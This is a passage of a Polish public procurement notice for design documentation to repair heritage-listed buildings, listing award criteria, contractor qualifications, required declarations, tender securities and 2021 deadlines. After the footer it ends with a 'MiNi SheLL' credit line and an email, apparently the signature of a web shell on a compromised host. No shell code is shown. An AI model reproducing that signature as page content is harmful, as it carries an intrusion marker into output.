budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres aktualizacji kosztorysów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym<br/>Opis spełnienia warunku:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziału w postępowaniu.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Opis spełnienia warunku: <br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziału w postępowaniu.<br/>3)	sytuacji ekonomicznej lub finansowej<br/>Opis spełnienia warunku:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziału w postępowaniu<br/>4)	zdolności technicznej lub zawodowej<br/>	Opis spełnienia warunku:<br/>1.	Wykonawca musi posiadać doświadczenie w wykonaniu usług (załącznik nr 8), w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Za spełnienie tego warunku Zamawiający uzna wykonanie minimum trzech zrealizowanych projektów remontu obiektów wpisanych do rejestru zabytków bądź objętych nadzorem Konserwatora Zabytków:<br/>a)	dla części I Projekt remontu elewacji w budynku nr 3-o wartości nie mniejszej niż 36.000,00 zł brutto każde (w tym jedna dokumentacja remontu elewacji),<br/>b)	dla części II: projekt remontu o wartości nie mniejszej niż 20.000,00 zł brutto każde,<br/>c)	dla części III projekt remontu elewacji w budynku nr 4-o wartości nie mniejszej niż 36.000,00 zł brutto każde (w tym jedna dokumentacja remontu elewacji), <br/>d)	dla części IV - projekt remontu o wartości nie mniejszej niż 28.000,00 zł brutto każde.<br/>2.	Wykonawca musi dysponować osobami, (załącznik nr 9) skierowanymi do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;.<br/>Za spełnienie tego warunku zamawiający uzna dysponowanie przez wykonawcę osobami <br/> z uprawnieniami budowlanymi upoważniającymi do wykonywania samodzielnej funkcji projektanta w wymaganej specjalności (dotyczy każdej części):<br/>a)	1 (jedna) osoba o uprawnieniach w specjalności architektonicznej do sporzą-dzania projektów w zakresie rozwiązań architektonicznych bez ograniczeń (oświadczenie załącznik nr 10),<br/>b)	1 (jedna) osoba o uprawnieniach w specjalności konstrukcyjnej do sporządzania projektów w zakresie rozwiązań konstrukcyjnej bez ograniczeń(oświadczenie załącznik nr 11),<br/>c)	1 (jedna) osoba o uprawnieniach budowlanych w specjalności instalacyjnej <br/>w zakresie instalacji sanitarnych(oświadczenie załącznik nr 12), <br/>d)	1 (jedna) osoba o uprawnieniach budowlanych w specjalności instalacyjnej <br/>w zakresie instalacji elektrycznych (oświadczenie załącznik nr 13), <br/> Wymagane doświadczenie zawodowe.<br/>Doświadczenie zawodowe w projektowaniu - min. 10 lat po uzyskaniu uprawnień do projektowania, w tym doświadczenie przy samodzielnym wykonaniu co najmniej jednego wykonawczego projektu architektoniczno-budowlanego, remontu lub modernizacji bądź przebudowy obiektu wpisanego do rejestru zabytków bądź objętego nadzorem Konserwatora Zabytków.<br/><br/>Ocena spełnienia warunków będzie dokonywana metodą 0-1, tj. spełnia/nie spełnia w oparciu o oświadczenia i dokumenty dołączone do oferty bądź po ich uzupełnieniu na wezwanie Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców - sporządzony według wzoru (załącznik nr 5).<br/>Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby- sporządzony według wzoru (załącznik nr 7).<br/>Oświadczenie o przynależności bądź braku przynależności do grupy kapitałowej (załącznik nr 4).<br/>Odpis z Krajowego Rejestru Sądowego lub informacja z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast ww. dokumentów składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – w przypadku wspólnego ubiegania się o zamówienia przez Wykonawców, oświadczenie o spełnianiu warunków udziału w postępowaniu składa ich pełnomocnik - sporządzone według wzoru (załącznik nr 6).<br/>Oświadczenia o dysponowaniu osobami (załącznik nr 10-13).<br/>Wykaz usług (załącznik nr 8).<br/>Wykaz osób (załącznik nr 9).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy- sporządzony według wzoru (załącznik nr 1).<br/>Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>Oświadczenie RODO - sporządzone według wzoru (załącznik nr 14).<br/>Dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający przewiduje konieczność złożenia wadium (dowód wniesienia wadium należy dołączyć do oferty) w wysokości:<br/>I część 500,00 zł (słownie: pięćset złotych 00/100).<br/>II część 300,00zł (słownie: trzysta złotych 00/100).<br/>III część 580,00zł (słownie: pięćset osiemdziesiąt złotych 00/100).<br/>IV część 400,00zł (słownie: czterysta złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projekt umowy § 13 załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-02 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-01</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com